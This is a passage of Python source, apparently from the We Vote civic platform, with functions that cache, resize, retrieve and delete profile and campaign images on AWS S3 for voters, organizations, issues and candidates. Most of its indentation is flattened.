        reset_issue_image_results = issue_manager.reset_issue_image_details(
            issue, issue_image_url='')
        if reset_issue_image_results['success']:
for we_vote_image in we_vote_image_list:
# Delete image from AWS
image_deleted_from_aws = we_vote_image_manager.delete_image_from_aws(
we_vote_image.we_vote_image_file_location)
delete_result = we_vote_image_manager.delete_we_vote_image(we_vote_image)
if delete_result['success']:
delete_image_count += 1
else:
not_deleted_image_count += 1
success = True
status = "DELETED_CACHED_IMAGES_FOR_ISSUE"
else:
success = False
status = "NO_IMAGE_FOUND_FOR_ISSUE"
results = {
'success': success,
'status': status,
'delete_image_count': delete_image_count,
'not_deleted_image_count': not_deleted_image_count,
}
return results
def delete_cached_images_for_organization(organization):
original_twitter_profile_image_url_https = None
original_twitter_profile_background_image_url_https = None
original_twitter_profile_banner_url_https = None
original_facebook_profile_image_url_https = None
original_facebook_background_image_url_https = None
    delete_image_count = 0
    not_deleted_image_count = 0
    success = False
    status = "NO_IMAGE_FOUND_FOR_ORGANIZATION"
we_vote_image_list = retrieve_all_images_for_one_organization(organization.we_vote_id)
if len(we_vote_image_list) > 0:
we_vote_image_manager = WeVoteImageManager()
for we_vote_image in we_vote_image_list:
if we_vote_image.kind_of_image_twitter_profile and we_vote_image.kind_of_image_original and \
we_vote_image.is_active_version:
original_twitter_profile_image_url_https = we_vote_image.twitter_profile_image_url_https
if we_vote_image.kind_of_image_twitter_background and we_vote_image.kind_of_image_original and \
we_vote_image.is_active_version:
original_twitter_profile_background_image_url_https = \
we_vote_image.twitter_profile_background_image_url_https
if we_vote_image.kind_of_image_twitter_banner and we_vote_image.kind_of_image_original and \
we_vote_image.is_active_version:
original_twitter_profile_banner_url_https = we_vote_image.twitter_profile_banner_url_https
if we_vote_image.kind_of_image_facebook_profile and we_vote_image.kind_of_image_original and \
we_vote_image.is_active_version:
original_facebook_profile_image_url_https = we_vote_image.facebook_profile_image_url_https
if we_vote_image.kind_of_image_facebook_background and we_vote_image.kind_of_image_original and \
we_vote_image.is_active_version:
original_facebook_background_image_url_https = we_vote_image.facebook_background_image_url_https
# Reset Organization with original image details
organization_manager = OrganizationManager()
reset_organization_image_results = organization_manager.reset_organization_image_details(
organization, original_twitter_profile_image_url_https, original_twitter_profile_background_image_url_https,
original_twitter_profile_banner_url_https, original_facebook_profile_image_url_https)
# Reset Twitter User Table with original image details
twitter_user_manager = TwitterUserManager()
reset_twitter_user_image_results = twitter_user_manager.reset_twitter_user_image_details(
organization.twitter_user_id, original_twitter_profile_image_url_https,
original_twitter_profile_background_image_url_https, original_twitter_profile_banner_url_https)
# Reset Position Table with original image details
reset_position_image_results = reset_position_entered_image_details_from_organization(
organization, original_twitter_profile_image_url_https, original_facebook_profile_image_url_https)
# Reset Voter Guide table with original image details
voter_guide_manager = VoterGuideManager()
reset_voter_guide_image_results = voter_guide_manager.reset_voter_guide_image_details(
organization, original_twitter_profile_image_url_https, original_facebook_profile_image_url_https)
# Reset Voter with original image details
voter_manager = VoterManager()
voter_results = voter_manager.retrieve_voter_by_organization_we_vote_id(organization.we_vote_id)
voter = voter_results['voter']
if voter_results['voter_found']:
reset_voter_image_results = voter_manager.reset_voter_image_details(
voter, original_twitter_profile_image_url_https, original_facebook_profile_image_url_https)
# Reset Facebook User Table with original image details
facebook_manager = FacebookManager()
reset_facebook_user_image_results = facebook_manager.reset_facebook_user_image_details(
organization.facebook_id, original_facebook_profile_image_url_https,
original_facebook_background_image_url_https)
if reset_organization_image_results['success']:
for we_vote_image in we_vote_image_list:
# Delete image from AWS
image_deleted_from_aws = we_vote_image_manager.delete_image_from_aws(
we_vote_image.we_vote_image_file_location)
delete_result = we_vote_image_manager.delete_we_vote_image(we_vote_image)
if delete_result['success']:
delete_image_count += 1
else:
not_deleted_image_count += 1
success = True
status = "DELETED_CACHED_IMAGES_FOR_CANDIDATE"
else:
success = False
status = "NO_IMAGE_FOUND_FOR_CANDIDATE"
results = {
'success': success,
'status': status,
'delete_image_count': delete_image_count,
'not_deleted_image_count': not_deleted_image_count,
}
return results
def delete_cached_images_for_voter(voter):
original_twitter_profile_image_url_https = None
original_twitter_profile_background_image_url_https = None
original_twitter_profile_banner_url_https = None
original_facebook_profile_image_url_https = None
original_facebook_background_image_url_https = None
    delete_image_count = 0
    not_deleted_image_count = 0
    success = False
    status = "NO_IMAGE_FOUND_FOR_VOTER"
we_vote_image_list = retrieve_all_images_for_one_voter(voter.id)
if len(we_vote_image_list) > 0:
we_vote_image_manager = WeVoteImageManager()
for we_vote_image in we_vote_image_list:
if we_vote_image.kind_of_image_twitter_profile and we_vote_image.kind_of_image_original and \
we_vote_image.is_active_version:
original_twitter_profile_image_url_https = we_vote_image.twitter_profile_image_url_https
if we_vote_image.kind_of_image_twitter_background and we_vote_image.kind_of_image_original and \
we_vote_image.is_active_version:
original_twitter_profile_background_image_url_https = \
we_vote_image.twitter_profile_background_image_url_https
if we_vote_image.kind_of_image_twitter_banner and we_vote_image.kind_of_image_original and \
we_vote_image.is_active_version:
original_twitter_profile_banner_url_https = we_vote_image.twitter_profile_banner_url_https
if we_vote_image.kind_of_image_facebook_profile and we_vote_image.kind_of_image_original and \
we_vote_image.is_active_version:
original_facebook_profile_image_url_https = we_vote_image.facebook_profile_image_url_https
if we_vote_image.kind_of_image_facebook_background and we_vote_image.kind_of_image_original and \
we_vote_image.is_active_version:
original_facebook_background_image_url_https = we_vote_image.facebook_background_image_url_https
# Reset Voter with original image details
voter_manager = VoterManager()
reset_voter_image_results = voter_manager.reset_voter_image_details(
voter, original_twitter_profile_image_url_https, original_facebook_profile_image_url_https)
# Reset Twitter User Table with original image details
twitter_user_manager = TwitterUserManager()
reset_twitter_user_image_results = twitter_user_manager.reset_twitter_user_image_details(
voter.twitter_id, original_twitter_profile_image_url_https,
original_twitter_profile_background_image_url_https, original_twitter_profile_banner_url_https)
# Reset Organization with original image details
organization_manager = OrganizationManager()
organization_results = organization_manager.retrieve_organization(0, '', '', voter.twitter_id)
organization = organization_results['organization']
if organization_results['organization_found']:
reset_organization_image_results = organization_manager.reset_organization_image_details(
organization, original_twitter_profile_image_url_https,
original_twitter_profile_background_image_url_https, original_twitter_profile_banner_url_https,
original_facebook_profile_image_url_https)
# Reset Position Table with original image details
reset_position_image_results = reset_position_for_friends_image_details_from_voter(
voter, original_twitter_profile_image_url_https, original_facebook_profile_image_url_https)
# Reset Facebook User Table with original image details
facebook_manager = FacebookManager()
reset_facebook_user_image_results = facebook_manager.reset_facebook_user_image_details(
voter.facebook_id, original_facebook_profile_image_url_https, original_facebook_background_image_url_https)
if reset_voter_image_results['success']:
for we_vote_image in we_vote_image_list:
# Delete image from AWS
image_deleted_from_aws = we_vote_image_manager.delete_image_from_aws(
we_vote_image.we_vote_image_file_location)
delete_result = we_vote_image_manager.delete_we_vote_image(we_vote_image)
if delete_result['success']:
delete_image_count += 1
else:
not_deleted_image_count += 1
success = True
status = "DELETED_CACHED_IMAGES_FOR_VOTER"
else:
success = False
status = "NO_IMAGE_FOUND_FOR_VOTER"
results = {
'success': success,
'status': status,
'delete_image_count': delete_image_count,
'not_deleted_image_count': not_deleted_image_count,
}
return results
def delete_stored_images_for_voter(voter):
"""
    This method removes all image data from the Voter, Facebook, and Twitter tables for this voter.
    Call delete_cached_images_for_voter() before calling this one to remove all of the cached images from AWS;
    otherwise the cached images will remain in AWS as unreferenced, wasted storage.
"""
success = False
# Delete Voter images
voter_manager = VoterManager()
voter_results = voter_manager.retrieve_voter_by_we_vote_id(voter.we_vote_id)
voter = voter_results['voter']
if voter_results['voter_found']:
voter.twitter_profile_image_url_https = ''
voter.we_vote_hosted_profile_image_url_large = ''
voter.we_vote_hosted_profile_image_url_medium = ''
voter.we_vote_hosted_profile_image_url_tiny = ''
voter.facebook_profile_image_url_https = ''
voter.save()
success = True
# Delete Twitter User Table images
if positive_value_exists(voter.twitter_id):
twitter_user_manager = TwitterUserManager()
twitter_results = twitter_user_manager.retrieve_twitter_user(voter.twitter_id)
twitter_user_found = twitter_results['twitter_user_found']
twitter_user = twitter_results['twitter_user']
if twitter_user_found:
twitter_user.twitter_profile_image_url_https = ''
twitter_user.twitter_profile_background_image_url_https = ''
twitter_user.twitter_profile_banner_url_https = ''
twitter_user.we_vote_hosted_profile_image_url_large = ''
twitter_user.we_vote_hosted_profile_image_url_medium = ''
twitter_user.we_vote_hosted_profile_image_url_tiny = ''
twitter_user.save()
success = True
# Delete Organization images, Dec 2019, not for now, don't want to cause exceptions
# Delete Position Table images, Dec 2019, not for now, don't want to cause exceptions
# Delete Facebook User Table images
if positive_value_exists(voter.facebook_id):
facebook_manager = FacebookManager()
facebook_user_results = facebook_manager.retrieve_facebook_user_by_facebook_user_id(voter.facebook_id)
facebook_user = facebook_user_results['facebook_user']
if facebook_user_results['facebook_user_found']:
facebook_user.facebook_profile_image_url_https = ''
facebook_user.facebook_background_image_url_https = ''
facebook_user.we_vote_hosted_profile_image_url_large = ''
facebook_user.we_vote_hosted_profile_image_url_medium = ''
facebook_user.we_vote_hosted_profile_image_url_tiny = ''
facebook_user.save()
success = True
    # Delete FacebookAuthResponse Table images, Dec 2019, not for now, so that an image will still display when voter signs in
    # Delete TwitterAuthResponse Table images, Dec 2019, not for now, so that an image will still display when voter signs in
if success:
status = "DELETED_STORED_IMAGES_FOR_VOTER"
else:
status = "NO_IMAGE_FOUND_FOR_VOTER"
results = {
'success': success,
'status': status,
}
return results
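# Illustrative usage sketch for the two deletion helpers above; the 'voter' object is an assumed
# placeholder retrieved elsewhere (for example via VoterManager). Per the docstring above, remove
# the cached AWS copies first, then clear the stored image fields.
#
#     cached_results = delete_cached_images_for_voter(voter)
#     if cached_results['success']:
#         print(cached_results['delete_image_count'], "cached images deleted,",
#               cached_results['not_deleted_image_count'], "could not be deleted")
#     stored_results = delete_stored_images_for_voter(voter)
#     print(stored_results['status'])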
def retrieve_all_images_for_one_candidate(candidate_we_vote_id):
"""
Retrieve all cached images for one candidate
:param candidate_we_vote_id:
:return:
"""
we_vote_image_list = []
candidate_manager = CandidateManager()
we_vote_image_manager = WeVoteImageManager()
if positive_value_exists(candidate_we_vote_id):
# if candidate_we_vote_id is defined then retrieve cached images for that candidate only
candidate_results = candidate_manager.retrieve_candidate_from_we_vote_id(candidate_we_vote_id)
if candidate_results['candidate_found']:
we_vote_image_list_results = we_vote_image_manager.\
retrieve_we_vote_image_list_from_we_vote_id(None, candidate_we_vote_id)
we_vote_image_list_query = we_vote_image_list_results['we_vote_image_list']
we_vote_image_list = list(we_vote_image_list_query)
return we_vote_image_list
def retrieve_all_images_for_one_organization(organization_we_vote_id):
"""
Retrieve all cached images for one organization
:param organization_we_vote_id:
:return:
"""
we_vote_image_list = []
organization_manager = OrganizationManager()
we_vote_image_manager = WeVoteImageManager()
if positive_value_exists(organization_we_vote_id):
        # if organization_we_vote_id is defined then retrieve cached images for that organization only
organization_results = organization_manager.retrieve_organization_from_we_vote_id(organization_we_vote_id)
if organization_results['organization_found']:
we_vote_image_list_results = we_vote_image_manager.\
retrieve_we_vote_image_list_from_we_vote_id(None, None, organization_we_vote_id)
we_vote_image_list_query = we_vote_image_list_results['we_vote_image_list']
we_vote_image_list = list(we_vote_image_list_query)
return we_vote_image_list
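# Illustrative usage sketch for the two retrieval helpers above; the we_vote_id values are assumed
# placeholders, and each call returns a plain list of WeVoteImage entries.
#
#     candidate_images = retrieve_all_images_for_one_candidate('wv01cand1234')
#     organization_images = retrieve_all_images_for_one_organization('wv01org1234')
#     for one_image in candidate_images:
#         print(one_image.we_vote_image_file_location)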
def cache_and_create_resized_images_for_organization(organization_we_vote_id):
"""
    Create resized images for a specific organization
:param organization_we_vote_id:
:return:
"""
create_all_resized_images_results = []
organization_manager = OrganizationManager()
we_vote_image_manager = WeVoteImageManager()
# cache original image
cache_images_for_one_organization_results = cache_organization_master_images(
organization_we_vote_id)
# create resized images for that organization only
organization_results = organization_manager.retrieve_organization_from_we_vote_id(organization_we_vote_id)
if organization_results['success']:
organization_we_vote_id = organization_results['organization'].we_vote_id
we_vote_image_list_results = we_vote_image_manager.\
retrieve_we_vote_image_list_from_we_vote_id(None, None, organization_we_vote_id)
for we_vote_image in we_vote_image_list_results['we_vote_image_list']:
# Iterate through all cached images
create_resized_images_results = create_resized_image_if_not_created(we_vote_image)
create_resized_images_results.update(cache_images_for_one_organization_results)
create_all_resized_images_results.append(create_resized_images_results)
return create_all_resized_images_results
def cache_and_create_resized_images_for_voter(voter_id):
"""
    Create resized images for a specific voter_id
:param voter_id:
:return:
"""
create_all_resized_images_results = []
voter_manager = VoterManager()
we_vote_image_manager = WeVoteImageManager()
# cache original image
cache_images_for_a_voter_results = cache_voter_master_images(voter_id)
# create resized images for that voter only
voter_results = voter_manager.retrieve_voter_by_id(voter_id)
if voter_results['success']:
voter_we_vote_id = voter_results['voter'].we_vote_id
we_vote_image_list_results = we_vote_image_manager.\
retrieve_we_vote_image_list_from_we_vote_id(voter_we_vote_id)
for we_vote_image in we_vote_image_list_results['we_vote_image_list']:
# Iterate through all cached images
create_resized_images_results = create_resized_image_if_not_created(we_vote_image)
create_resized_images_results.update(cache_images_for_a_voter_results)
create_all_resized_images_results.append(create_resized_images_results)
return create_all_resized_images_results
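# Illustrative usage sketch: cache the master images and build resized versions for one organization
# or one voter. The ids below are assumed placeholders; each call returns a list of per-image result
# dicts produced by create_resized_image_if_not_created().
#
#     organization_results = cache_and_create_resized_images_for_organization('wv01org1234')
#     voter_results = cache_and_create_resized_images_for_voter(12345)
#     for one_result in voter_results:
#         print(one_result['cached_large_image'], one_result['cached_medium_image'],
#               one_result['cached_tiny_image'])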
def cache_campaignx_image(
python_image_library_image=None,
campaignx_we_vote_id=None,
kind_of_image_original=False,
kind_of_image_campaignx_photo=False):
"""
Cache master campaignx images to AWS.
:param python_image_library_image:
:param campaignx_we_vote_id:
:param kind_of_image_original:
:param kind_of_image_campaignx_photo:
:return:
"""
we_vote_parent_image_id = None
success = False
status = ''
is_active_version = True
we_vote_image_created = False
image_url_valid = False
image_stored_from_source = False
image_stored_to_aws = False
image_versions = []
we_vote_image_manager = WeVoteImageManager()
create_we_vote_image_results = we_vote_image_manager.create_we_vote_image(
campaignx_we_vote_id=campaignx_we_vote_id,
kind_of_image_campaignx_photo=kind_of_image_campaignx_photo,
kind_of_image_original=kind_of_image_original)
status += create_we_vote_image_results['status']
if not create_we_vote_image_results['we_vote_image_saved']:
error_results = {
'success': success,
'status': status,
'we_vote_image_created': we_vote_image_created,
'image_url_valid': image_url_valid,
'image_stored_from_source': image_stored_from_source,
'image_stored_to_aws': image_stored_to_aws,
'we_vote_image': None
}
return error_results
we_vote_image_created = True
we_vote_image = create_we_vote_image_results['we_vote_image']
    # Validate the image file and get the source image properties
analyze_source_images_results = analyze_image_in_memory(python_image_library_image)
if not analyze_source_images_results['image_url_valid']:
error_results = {
'success': success,
'status': status + " IMAGE_URL_NOT_VALID ",
'we_vote_image_created': True,
'image_url_valid': False,
'image_stored_from_source': image_stored_from_source,
'image_stored_to_aws': image_stored_to_aws,
'we_vote_image': None
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
image_url_valid = True
status += " IMAGE_URL_VALID "
image_width = analyze_source_images_results['image_width']
image_height = analyze_source_images_results['image_height']
image_format = analyze_source_images_results['image_format']
# Get today's cached images and their versions so that image version can be calculated
cached_todays_we_vote_image_list_results = we_vote_image_manager.retrieve_todays_cached_we_vote_image_list(
campaignx_we_vote_id=campaignx_we_vote_id,
kind_of_image_campaignx_photo=kind_of_image_campaignx_photo,
kind_of_image_original=kind_of_image_original)
for cached_we_vote_image in cached_todays_we_vote_image_list_results['we_vote_image_list']:
if cached_we_vote_image.same_day_image_version:
image_versions.append(cached_we_vote_image.same_day_image_version)
if image_versions:
same_day_image_version = max(image_versions) + 1
else:
same_day_image_version = 1
image_stored_from_source = True
date_image_saved = "{year}{:02d}{:02d}".format(we_vote_image.date_image_saved.month,
we_vote_image.date_image_saved.day,
year=we_vote_image.date_image_saved.year)
if kind_of_image_campaignx_photo:
image_type = CAMPAIGNX_PHOTO_IMAGE_NAME
else:
image_type = 'campaignx_photo_image'
if kind_of_image_original:
master_image = MASTER_IMAGE
else:
master_image = 'calculated'
    # ex campaignx_photo_master-2017210_1_48x48.png
we_vote_image_file_name = "{image_type}_{master_image}-{date_image_saved}_{counter}_" \
"{image_width}x{image_height}.{image_format}" \
"".format(image_type=image_type,
master_image=master_image,
date_image_saved=date_image_saved,
counter=str(same_day_image_version),
image_width=str(image_width),
image_height=str(image_height),
image_format=str(image_format))
we_vote_image_file_location = campaignx_we_vote_id + "/" + we_vote_image_file_name
image_stored_locally = we_vote_image_manager.store_python_image_locally(
python_image_library_image, we_vote_image_file_name)
if not image_stored_locally:
error_results = {
'success': success,
'status': status + " IMAGE_NOT_STORED_LOCALLY ",
'we_vote_image_created': we_vote_image_created,
'image_url_valid': image_url_valid,
'image_stored_from_source': image_stored_from_source,
'image_stored_locally': False,
'image_stored_to_aws': image_stored_to_aws,
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
image_stored_to_aws = we_vote_image_manager.store_image_to_aws(
we_vote_image_file_name, we_vote_image_file_location, image_format)
if not image_stored_to_aws:
error_results = {
'success': success,
'status': status + " IMAGE_NOT_STORED_TO_AWS ",
'we_vote_image_created': we_vote_image_created,
'image_url_valid': image_url_valid,
'image_stored_from_source': image_stored_from_source,
'image_stored_to_aws': False,
'we_vote_image': None
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
we_vote_image_url = "https://{bucket_name}.s3.amazonaws.com/{we_vote_image_file_location}" \
"".format(bucket_name=AWS_STORAGE_BUCKET_NAME,
we_vote_image_file_location=we_vote_image_file_location)
save_aws_info = we_vote_image_manager.save_we_vote_image_aws_info(
we_vote_image, we_vote_image_url,
we_vote_image_file_location,
we_vote_parent_image_id, is_active_version)
status += " IMAGE_STORED_TO_AWS " + save_aws_info['status'] + " "
success = save_aws_info['success']
if not success:
error_results = {
'success': success,
'status': status,
'we_vote_image_created': we_vote_image_created,
'image_url_valid': image_url_valid,
'image_stored_from_source': image_stored_from_source,
'image_stored_to_aws': image_stored_to_aws,
'we_vote_image': None
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
kind_of_image_large = not kind_of_image_original
save_source_info_results = we_vote_image_manager.save_we_vote_image_campaignx_info(
we_vote_image=we_vote_image,
image_width=analyze_source_images_results['image_width'],
image_height=analyze_source_images_results['image_height'],
image_url_https=we_vote_image.we_vote_image_url,
same_day_image_version=same_day_image_version,
image_url_valid=image_url_valid)
status += " " + save_source_info_results['status']
if not save_source_info_results['success']:
error_results = {
'success': success,
'status': status,
'we_vote_image_created': we_vote_image_created,
'image_url_valid': image_url_valid,
'image_stored_from_source': False,
'image_stored_to_aws': image_stored_to_aws,
'we_vote_image': None
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
# set active version False for other master images for same campaignx
set_active_version_false_results = we_vote_image_manager.set_active_version_false_for_other_images(
campaignx_we_vote_id=campaignx_we_vote_id,
image_url_https=we_vote_image.we_vote_image_url,
kind_of_image_campaignx_photo=kind_of_image_campaignx_photo)
status += set_active_version_false_results['status']
results = {
'success': success,
'status': status,
'we_vote_image_created': we_vote_image_created,
'image_url_valid': image_url_valid,
'image_stored_from_source': image_stored_from_source,
'image_stored_to_aws': image_stored_to_aws,
'we_vote_image': we_vote_image
}
return results
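# Illustrative usage sketch for cache_campaignx_image(): the function expects an image already loaded
# with the Python Imaging Library. The 'Image.open' call, file name, and campaignx we_vote_id below
# are assumed placeholders.
#
#     from PIL import Image
#     campaignx_photo = Image.open('photo_uploaded_by_campaign_owner.jpg')
#     cache_results = cache_campaignx_image(
#         python_image_library_image=campaignx_photo,
#         campaignx_we_vote_id='wv01camp1234',
#         kind_of_image_original=True,
#         kind_of_image_campaignx_photo=True)
#     if cache_results['success']:
#         print(cache_results['we_vote_image'].we_vote_image_url)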
def retrieve_all_images_for_one_issue(issue_we_vote_id):
"""
Retrieve all cached images for one issue
:param issue_we_vote_id:
:return:
"""
we_vote_image_list = []
we_vote_image_manager = WeVoteImageManager()
if issue_we_vote_id:
# if issue_we_vote_id is defined then retrieve cached images for that issue only
we_vote_image_list_results = we_vote_image_manager.\
retrieve_we_vote_image_list_from_we_vote_id(issue_we_vote_id=issue_we_vote_id)
we_vote_image_list_query = we_vote_image_list_results['we_vote_image_list']
we_vote_image_list = list(we_vote_image_list_query)
return we_vote_image_list
def retrieve_all_images_for_one_voter(voter_id):
"""
Retrieve all cached images for one voter
:param voter_id:
:return:
"""
we_vote_image_list = []
voter_manager = VoterManager()
we_vote_image_manager = WeVoteImageManager()
if voter_id:
# if voter_id is defined then retrieve cached images for that voter only
voter_results = voter_manager.retrieve_voter_by_id(voter_id)
if voter_results['success']:
voter_we_vote_id = voter_results['voter'].we_vote_id
we_vote_image_list_results = we_vote_image_manager.\
retrieve_we_vote_image_list_from_we_vote_id(voter_we_vote_id)
we_vote_image_list_query = we_vote_image_list_results['we_vote_image_list']
we_vote_image_list = list(we_vote_image_list_query)
return we_vote_image_list
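# Illustrative usage sketch for the issue and voter retrieval helpers above; the issue we_vote_id and
# voter_id are assumed placeholders.
#
#     issue_images = retrieve_all_images_for_one_issue('wv01issue1234')
#     voter_images = retrieve_all_images_for_one_voter(12345)
#     print(len(issue_images), "issue images,", len(voter_images), "voter images")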
def create_resized_image_if_not_created(we_vote_image):
"""
    Create resized images for this we_vote_image entry, but only if they have not already been created
:param we_vote_image:
:return:
"""
voter_we_vote_id = we_vote_image.voter_we_vote_id
campaignx_we_vote_id = we_vote_image.campaignx_we_vote_id
candidate_we_vote_id = we_vote_image.candidate_we_vote_id
organization_we_vote_id = we_vote_image.organization_we_vote_id
google_civic_election_id = we_vote_image.google_civic_election_id
we_vote_parent_image_id = we_vote_image.id
twitter_id = we_vote_image.twitter_id
facebook_user_id = we_vote_image.facebook_user_id
maplight_id = we_vote_image.maplight_id
vote_smart_id = we_vote_image.vote_smart_id
other_source = we_vote_image.other_source
kind_of_image_twitter_profile = we_vote_image.kind_of_image_twitter_profile
kind_of_image_twitter_background = we_vote_image.kind_of_image_twitter_background
kind_of_image_twitter_banner = we_vote_image.kind_of_image_twitter_banner
kind_of_image_facebook_profile = we_vote_image.kind_of_image_facebook_profile
kind_of_image_facebook_background = we_vote_image.kind_of_image_facebook_background
kind_of_image_maplight = we_vote_image.kind_of_image_maplight
kind_of_image_vote_smart = we_vote_image.kind_of_image_vote_smart
kind_of_image_ballotpedia_profile = we_vote_image.kind_of_image_ballotpedia_profile
kind_of_image_campaignx_photo = we_vote_image.kind_of_image_campaignx_photo
kind_of_image_linkedin_profile = we_vote_image.kind_of_image_linkedin_profile
kind_of_image_wikipedia_profile = we_vote_image.kind_of_image_wikipedia_profile
kind_of_image_other_source = we_vote_image.kind_of_image_other_source
image_offset_x = we_vote_image.facebook_background_image_offset_x
image_offset_y = we_vote_image.facebook_background_image_offset_y
if positive_value_exists(we_vote_image.we_vote_image_file_location):
image_format = we_vote_image.we_vote_image_file_location.split(".")[-1]
else:
image_format = ""
create_resized_image_results = {
'voter_we_vote_id': voter_we_vote_id,
'campaignx_we_vote_id': campaignx_we_vote_id,
'candidate_we_vote_id': candidate_we_vote_id,
'organization_we_vote_id': organization_we_vote_id,
'cached_large_image': False,
'cached_medium_image': False,
'cached_tiny_image': False,
}
if we_vote_image.kind_of_image_twitter_profile:
image_url_https = we_vote_image.twitter_profile_image_url_https
elif we_vote_image.kind_of_image_twitter_background:
image_url_https = we_vote_image.twitter_profile_background_image_url_https
elif we_vote_image.kind_of_image_twitter_banner:
image_url_https = we_vote_image.twitter_profile_banner_url_https
elif we_vote_image.kind_of_image_facebook_profile:
image_url_https = we_vote_image.facebook_profile_image_url_https
elif we_vote_image.kind_of_image_facebook_background:
image_url_https = we_vote_image.facebook_background_image_url_https
elif we_vote_image.kind_of_image_maplight:
image_url_https = we_vote_image.maplight_image_url_https
elif we_vote_image.kind_of_image_vote_smart:
image_url_https = we_vote_image.vote_smart_image_url_https
elif we_vote_image.kind_of_image_ballotpedia_profile:
image_url_https = we_vote_image.ballotpedia_profile_image_url
elif we_vote_image.kind_of_image_campaignx_photo:
image_url_https = we_vote_image.campaignx_photo_url_https
elif we_vote_image.kind_of_image_linkedin_profile:
image_url_https = we_vote_image.linkedin_profile_image_url
elif we_vote_image.kind_of_image_wikipedia_profile:
image_url_https = we_vote_image.wikipedia_profile_image_url
elif we_vote_image.kind_of_image_other_source:
image_url_https = we_vote_image.other_source_image_url
else:
image_url_https = ''
# Check if resized image versions exist or not
resized_version_exists_results = check_resized_version_exists(
voter_we_vote_id=voter_we_vote_id,
campaignx_we_vote_id=campaignx_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
image_url_https=image_url_https,
kind_of_image_twitter_profile=kind_of_image_twitter_profile,
kind_of_image_twitter_background=kind_of_image_twitter_background,
kind_of_image_twitter_banner=kind_of_image_twitter_banner,
kind_of_image_facebook_profile=kind_of_image_facebook_profile,
kind_of_image_facebook_background=kind_of_image_facebook_background,
kind_of_image_maplight=kind_of_image_maplight,
kind_of_image_vote_smart=kind_of_image_vote_smart,
kind_of_image_ballotpedia_profile=kind_of_image_ballotpedia_profile,
kind_of_image_campaignx_photo=kind_of_image_campaignx_photo,
kind_of_image_linkedin_profile=kind_of_image_linkedin_profile,
kind_of_image_wikipedia_profile=kind_of_image_wikipedia_profile,
kind_of_image_other_source=kind_of_image_other_source
)
if not resized_version_exists_results['large_image_version_exists']:
        # Large version does not exist, so create a resized image and cache it
cache_resized_image_locally_results = cache_resized_image_locally(
google_civic_election_id,
image_url_https,
we_vote_parent_image_id,
voter_we_vote_id=voter_we_vote_id,
campaignx_we_vote_id=campaignx_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
twitter_id=twitter_id,
facebook_user_id=facebook_user_id,
maplight_id=maplight_id,
vote_smart_id=vote_smart_id,
image_format=image_format,
kind_of_image_twitter_profile=kind_of_image_twitter_profile,
kind_of_image_twitter_background=kind_of_image_twitter_background,
kind_of_image_twitter_banner=kind_of_image_twitter_banner,
kind_of_image_facebook_profile=kind_of_image_facebook_profile,
kind_of_image_facebook_background=kind_of_image_facebook_background,
kind_of_image_maplight=kind_of_image_maplight,
kind_of_image_vote_smart=kind_of_image_vote_smart,
kind_of_image_ballotpedia_profile=kind_of_image_ballotpedia_profile,
kind_of_image_campaignx_photo=kind_of_image_campaignx_photo,
kind_of_image_linkedin_profile=kind_of_image_linkedin_profile,
kind_of_image_wikipedia_profile=kind_of_image_wikipedia_profile,
kind_of_image_other_source=kind_of_image_other_source,
kind_of_image_large=True,
image_offset_x=image_offset_x,
image_offset_y=image_offset_y,
other_source=other_source)
create_resized_image_results['cached_large_image'] = cache_resized_image_locally_results['success']
else:
create_resized_image_results['cached_large_image'] = IMAGE_ALREADY_CACHED
# Only some of our kinds of images have medium or tiny sizes
if we_vote_image.kind_of_image_campaignx_photo or \
we_vote_image.kind_of_image_twitter_profile or \
we_vote_image.kind_of_image_facebook_profile or \
we_vote_image.kind_of_image_maplight or \
we_vote_image.kind_of_image_vote_smart or \
we_vote_image.kind_of_image_ballotpedia_profile or \
we_vote_image.kind_of_image_linkedin_profile or \
we_vote_image.kind_of_image_wikipedia_profile or \
we_vote_image.kind_of_image_other_source:
if not resized_version_exists_results['medium_image_version_exists']:
            # Medium version does not exist, so create a resized image and cache it
cache_resized_image_locally_results = cache_resized_image_locally(
google_civic_election_id, image_url_https, we_vote_parent_image_id,
voter_we_vote_id=voter_we_vote_id,
campaignx_we_vote_id=campaignx_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
twitter_id=twitter_id,
facebook_user_id=facebook_user_id,
maplight_id=maplight_id,
vote_smart_id=vote_smart_id,
image_format=image_format,
kind_of_image_twitter_profile=kind_of_image_twitter_profile,
kind_of_image_twitter_background=kind_of_image_twitter_background,
kind_of_image_twitter_banner=kind_of_image_twitter_banner,
kind_of_image_facebook_profile=kind_of_image_facebook_profile,
kind_of_image_facebook_background=kind_of_image_facebook_background,
kind_of_image_maplight=kind_of_image_maplight,
kind_of_image_vote_smart=kind_of_image_vote_smart,
kind_of_image_ballotpedia_profile=kind_of_image_ballotpedia_profile,
kind_of_image_campaignx_photo=kind_of_image_campaignx_photo,
kind_of_image_linkedin_profile=kind_of_image_linkedin_profile,
kind_of_image_wikipedia_profile=kind_of_image_wikipedia_profile,
kind_of_image_other_source=kind_of_image_other_source,
kind_of_image_medium=True,
image_offset_x=image_offset_x,
image_offset_y=image_offset_y,
other_source=other_source)
create_resized_image_results['cached_medium_image'] = cache_resized_image_locally_results['success']
else:
create_resized_image_results['cached_medium_image'] = IMAGE_ALREADY_CACHED
if not resized_version_exists_results['tiny_image_version_exists']:
            # Tiny version does not exist, so create a resized image and cache it
cache_resized_image_locally_results = cache_resized_image_locally(
google_civic_election_id, image_url_https, we_vote_parent_image_id,
voter_we_vote_id=voter_we_vote_id,
campaignx_we_vote_id=campaignx_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
twitter_id=twitter_id,
facebook_user_id=facebook_user_id,
maplight_id=maplight_id,
vote_smart_id=vote_smart_id,
image_format=image_format,
kind_of_image_twitter_profile=kind_of_image_twitter_profile,
kind_of_image_twitter_background=kind_of_image_twitter_background,
kind_of_image_twitter_banner=kind_of_image_twitter_banner,
kind_of_image_facebook_profile=kind_of_image_facebook_profile,
